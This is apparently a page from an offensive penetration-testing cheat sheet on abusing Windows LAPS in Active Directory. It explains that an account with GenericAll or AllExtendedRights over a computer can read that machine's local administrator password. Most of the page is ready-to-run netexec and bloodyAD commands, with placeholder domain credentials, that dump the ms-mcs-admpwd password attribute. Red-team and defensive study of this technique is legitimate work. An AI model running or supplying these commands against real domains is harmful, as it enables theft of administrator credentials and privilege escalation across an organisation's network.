Skip to content

LAPS

On a computer, if LAPS is in use, you can find AdmPwd.dll

powershell
dir "c:\Program Files\laps\cse\AdmPwd.dll"

This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).

Netexec

bash
nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module laps
bash
nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module laps -O computer="us-d*"

BloodyAD

bash
bloodyAD --host DC_IP -d DOMAIN -u USER -p PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime